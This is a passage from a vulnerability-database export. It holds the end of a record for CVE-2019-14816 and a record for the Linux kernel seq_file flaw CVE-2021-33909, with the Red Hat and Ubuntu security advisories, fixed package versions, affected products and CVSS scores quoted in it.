        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-8912"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11487"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11487"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-18559"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8912"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3693"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17666"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17666"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1019.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1020.20"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4157-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-32.34"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15504"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1024.25"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16714"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1023.24"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1020.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1021.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1027.30~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4162-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1048.48"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1052.54~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1047.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1027.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-66.75"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1059.68"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1061.66"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1046.49"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1049.53"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15918"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1066.73"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-66.75~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1052.54"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4163-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-166.195"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1128.136"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1124.133"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1060.67"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1096.107"
      }
    ],
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "156020"
      },
      {
        "db": "PACKETSTORM",
        "id": "157042"
      },
      {
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154934"
      },
      {
        "db": "PACKETSTORM",
        "id": "154946"
      },
      {
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "db": "PACKETSTORM",
        "id": "154935"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "PACKETSTORM",
        "id": "156020",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "157042",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "156213",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "156603",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154897",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154934",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154946",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "156216",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "154935",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2020-01-21T19:10:15",
        "db": "PACKETSTORM",
        "id": "156020",
        "ident": null
      },
      {
        "date": "2020-04-01T15:21:52",
        "db": "PACKETSTORM",
        "id": "157042",
        "ident": null
      },
      {
        "date": "2020-02-05T18:37:11",
        "db": "PACKETSTORM",
        "id": "156213",
        "ident": null
      },
      {
        "date": "2020-03-03T14:09:01",
        "db": "PACKETSTORM",
        "id": "156603",
        "ident": null
      },
      {
        "date": "2019-10-17T15:18:45",
        "db": "PACKETSTORM",
        "id": "154897",
        "ident": null
      },
      {
        "date": "2019-10-22T17:26:43",
        "db": "PACKETSTORM",
        "id": "154934",
        "ident": null
      },
      {
        "date": "2019-10-23T18:28:39",
        "db": "PACKETSTORM",
        "id": "154946",
        "ident": null
      },
      {
        "date": "2020-02-05T18:49:35",
        "db": "PACKETSTORM",
        "id": "156216",
        "ident": null
      },
      {
        "date": "2019-10-22T17:26:50",
        "db": "PACKETSTORM",
        "id": "154935",
        "ident": null
      },
      {
        "date": "2019-08-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201908-2176",
        "ident": null
      },
      {
        "date": "2019-09-20T19:15:11.767000",
        "db": "NVD",
        "id": "CVE-2019-14816",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-03-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201908-2176",
        "ident": null
      },
      {
        "date": "2024-11-21T04:27:25.253000",
        "db": "NVD",
        "id": "CVE-2019-14816",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154934"
      },
      {
        "db": "PACKETSTORM",
        "id": "154935"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "_id": null,
    "data": "Linux kernel Buffer error vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "_id": null,
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      }
    ],
    "trust": 0.6
  }
}

VAR-202107-1361

Vulnerability from variot - Updated: 2026-03-09 20:45

fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. 6 ELS) - i386, s390x, x86_64

8) - x86_64
Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Bug Fix(es):

kernel-rt: update RT source tree to the RHEL-8.4.z2 source tree (BZ#1975405)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2021:2730-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:2730 Issue date: 2021-07-20 CVE Names: CVE-2021-3347 CVE-2021-33034 CVE-2021-33909 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support, Red Hat Enterprise Linux 7.6 Telco Extended Update Support, and Red Hat Enterprise Linux 7.6 Update Services for SAP Solutions.

Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.6) - noarch, x86_64 Red Hat Enterprise Linux Server E4S (v. 7.6) - noarch, ppc64le, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.6) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.6) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.6) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.6) - noarch, x86_64

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

kernel: size_t-to-int conversion vulnerability in the filesystem layer (CVE-2021-33909)
kernel: Use after free via PI futex state (CVE-2021-3347)
kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan (CVE-2021-33034)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

[CKI kernel builds]: x86 binaries in non-x86 kernel rpms breaks systemtap [7.9.z] (BZ#1975159)
Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

Bugs fixed (https://bugzilla.redhat.com/):

1922249 - CVE-2021-3347 kernel: Use after free via PI futex state 1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan 1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer

Package List:

Red Hat Enterprise Linux Server AUS (v. 7.6):

Source: kernel-3.10.0-957.78.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.78.2.el7.noarch.rpm kernel-doc-3.10.0-957.78.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-957.78.2.el7.x86_64.rpm kernel-3.10.0-957.78.2.el7.x86_64.rpm kernel-debug-3.10.0-957.78.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.78.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.78.2.el7.x86_64.rpm kernel-devel-3.10.0-957.78.2.el7.x86_64.rpm kernel-headers-3.10.0-957.78.2.el7.x86_64.rpm kernel-tools-3.10.0-957.78.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.78.2.el7.x86_64.rpm perf-3.10.0-957.78.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm python-perf-3.10.0-957.78.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.6):

Source: kernel-3.10.0-957.78.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.78.2.el7.noarch.rpm kernel-doc-3.10.0-957.78.2.el7.noarch.rpm

ppc64le: kernel-3.10.0-957.78.2.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-957.78.2.el7.ppc64le.rpm kernel-debug-3.10.0-957.78.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-957.78.2.el7.ppc64le.rpm kernel-devel-3.10.0-957.78.2.el7.ppc64le.rpm kernel-headers-3.10.0-957.78.2.el7.ppc64le.rpm kernel-tools-3.10.0-957.78.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm kernel-tools-libs-3.10.0-957.78.2.el7.ppc64le.rpm perf-3.10.0-957.78.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm python-perf-3.10.0-957.78.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm

x86_64: kernel-3.10.0-957.78.2.el7.x86_64.rpm kernel-debug-3.10.0-957.78.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.78.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.78.2.el7.x86_64.rpm kernel-devel-3.10.0-957.78.2.el7.x86_64.rpm kernel-headers-3.10.0-957.78.2.el7.x86_64.rpm kernel-tools-3.10.0-957.78.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.78.2.el7.x86_64.rpm perf-3.10.0-957.78.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm python-perf-3.10.0-957.78.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.6):

Source: kernel-3.10.0-957.78.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.78.2.el7.noarch.rpm kernel-doc-3.10.0-957.78.2.el7.noarch.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.6):

x86_64: kernel-debug-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.78.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.78.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.78.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.6):

ppc64le: kernel-debug-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm kernel-debug-devel-3.10.0-957.78.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-957.78.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-957.78.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-957.78.2.el7.ppc64le.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.6):

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2021-3347 https://access.redhat.com/security/cve/CVE-2021-33034 https://access.redhat.com/security/cve/CVE-2021-33909 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/RHSB-2021-006

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYPc/p9zjgjWX9erEAQiGYQ/6Apfv6Vn+s1cJsOrv5bpIB+TZWR8Dw4w6 7q5tqmrA0W38qvq7EWqVwAZMtmF2YXIcuP8i8zELAPG/Y1oMax3Piy5nxc4OR55i 8H9pc0lGZn9UJtryWMPaJRqvWGF1WhE/vGPUkHhI3CmoSVDN3B3OqfC04oeVa/Gt f9wikugrLvXoD+YsJk1LAn0tJ+xGrcbMRvwxvvtvwRsje2cGPU6OAEWQr1ZKyNZc Fwi6jLUve8d3wxE6+C6IocTYMcZcw2e2U4KOwE/ONXjjNgbwV+deQU16HJk4BjcA rDqtVUWzNGXzONh6Ua4yEisVe8LdhPNoZaciNx56lKpOs8Vbv58w29edfR1zf0fW c1gH+0S19jDSwsESNSKJth5A/GY0zxsUeh5qDjoFUF1AH6IuZNmPb3VGcl5klKuo outLUo2jeIRiBiZaNSVe32nbWCEkAoFF5WrvfHYmi+i9U45gLvUG2N58ZtOQiQkb potW9xF7f15Mm1Xm9TOIaNy+ykh7TJRxKnQSaAk/jnzTLp3XeVNmPTztx7zA4Z50 bgM/MQWB9j7NMjwEopdbS4lxJsvaXerwXPT+1WDAzBZ5clOKyB5hTxTTBOrsErzs O+wKRVu9eU4FMR6ULeL+pLCZPm0eVlu9jBuySEUI05/FkAVu/YUDrgXvMiy6XknI ziN+XVubHjk=1ifB -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 7) - ppc64le, x86_64

Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. ========================================================================= Ubuntu Security Notice USN-5016-1 July 20, 2021

linux, linux-aws, linux-aws-5.8, linux-azure, linux-azure-5.8, linux-gcp, linux-gcp-5.8, linux-hwe-5.8, linux-kvm, linux-oracle, linux-oracle-5.8, linux-raspi vulnerabilities ========================================================================= A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 20.10
Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-33909)

Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)

It was discovered that a race condition in the kernel Bluetooth subsystem could lead to use-after-free of slab objects. An attacker could use this issue to possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)

It was discovered that an out-of-bounds (OOB) memory access flaw existed in the f2fs module of the Linux kernel. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.10: linux-image-5.8.0-1032-raspi 5.8.0-1032.35 linux-image-5.8.0-1032-raspi-nolpae 5.8.0-1032.35 linux-image-5.8.0-1033-kvm 5.8.0-1033.36 linux-image-5.8.0-1037-oracle 5.8.0-1037.38 linux-image-5.8.0-1038-gcp 5.8.0-1038.40 linux-image-5.8.0-1039-azure 5.8.0-1039.42 linux-image-5.8.0-1041-aws 5.8.0-1041.43 linux-image-5.8.0-63-generic 5.8.0-63.71 linux-image-5.8.0-63-generic-64k 5.8.0-63.71 linux-image-5.8.0-63-generic-lpae 5.8.0-63.71 linux-image-5.8.0-63-lowlatency 5.8.0-63.71 linux-image-aws 5.8.0.1041.43 linux-image-azure 5.8.0.1039.40 linux-image-gcp 5.8.0.1038.38 linux-image-generic 5.8.0.63.69 linux-image-generic-64k 5.8.0.63.69 linux-image-generic-lpae 5.8.0.63.69 linux-image-gke 5.8.0.1038.38 linux-image-kvm 5.8.0.1033.36 linux-image-lowlatency 5.8.0.63.69 linux-image-oem-20.04 5.8.0.63.69 linux-image-oracle 5.8.0.1037.36 linux-image-raspi 5.8.0.1032.34 linux-image-raspi-nolpae 5.8.0.1032.34 linux-image-virtual 5.8.0.63.69

Ubuntu 20.04 LTS: linux-image-5.8.0-1037-oracle 5.8.0-1037.38~20.04.1 linux-image-5.8.0-1038-gcp 5.8.0-1038.40~20.04.1 linux-image-5.8.0-1039-azure 5.8.0-1039.42~20.04.1 linux-image-5.8.0-1041-aws 5.8.0-1041.43~20.04.1 linux-image-5.8.0-63-generic 5.8.0-63.71~20.04.1 linux-image-5.8.0-63-generic-64k 5.8.0-63.71~20.04.1 linux-image-5.8.0-63-generic-lpae 5.8.0-63.71~20.04.1 linux-image-5.8.0-63-lowlatency 5.8.0-63.71~20.04.1 linux-image-aws 5.8.0.1041.43~20.04.13 linux-image-azure 5.8.0.1039.42~20.04.11 linux-image-gcp 5.8.0.1038.40~20.04.13 linux-image-generic-64k-hwe-20.04 5.8.0.63.71~20.04.45 linux-image-generic-hwe-20.04 5.8.0.63.71~20.04.45 linux-image-generic-lpae-hwe-20.04 5.8.0.63.71~20.04.45 linux-image-lowlatency-hwe-20.04 5.8.0.63.71~20.04.45 linux-image-oracle 5.8.0.1037.38~20.04.13 linux-image-virtual-hwe-20.04 5.8.0.63.71~20.04.45

After a standard system update you need to reboot your computer to make all the necessary changes.

Maxim Levitsky and Paolo Bonzini discovered that the KVM hypervisor implementation for AMD processors in the Linux kernel allowed a guest VM to disable restrictions on VMLOAD/VMSAVE in a nested guest. An attacker in a guest VM could use this to read or write portions of the host’s physical memory. (CVE-2021-22555)

It was discovered that the virtual file system implementation in the Linux kernel contained an unsigned to signed integer conversion error. If you are running a kernel version earlier than the one listed below, please upgrade your kernel as soon as possible

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.12.43"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.276"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.240"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.134"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12.19"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13.4"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.276"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.52"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "sma1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.4.2-02044"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.198"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163578"
      },
      {
        "db": "PACKETSTORM",
        "id": "163579"
      },
      {
        "db": "PACKETSTORM",
        "id": "163583"
      },
      {
        "db": "PACKETSTORM",
        "id": "163594"
      },
      {
        "db": "PACKETSTORM",
        "id": "163602"
      },
      {
        "db": "PACKETSTORM",
        "id": "163603"
      },
      {
        "db": "PACKETSTORM",
        "id": "163607"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2021-33909",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-33909",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.1,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2021-33909",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-33909",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-33909",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. 6 ELS) - i386, s390x, x86_64\n\n3. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.4.z2 source tree\n(BZ#1975405)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2021:2730-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2730\nIssue date:        2021-07-20\nCVE Names:         CVE-2021-3347 CVE-2021-33034 CVE-2021-33909\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.6\nAdvanced Update Support, Red Hat Enterprise Linux 7.6 Telco Extended Update\nSupport, and Red Hat 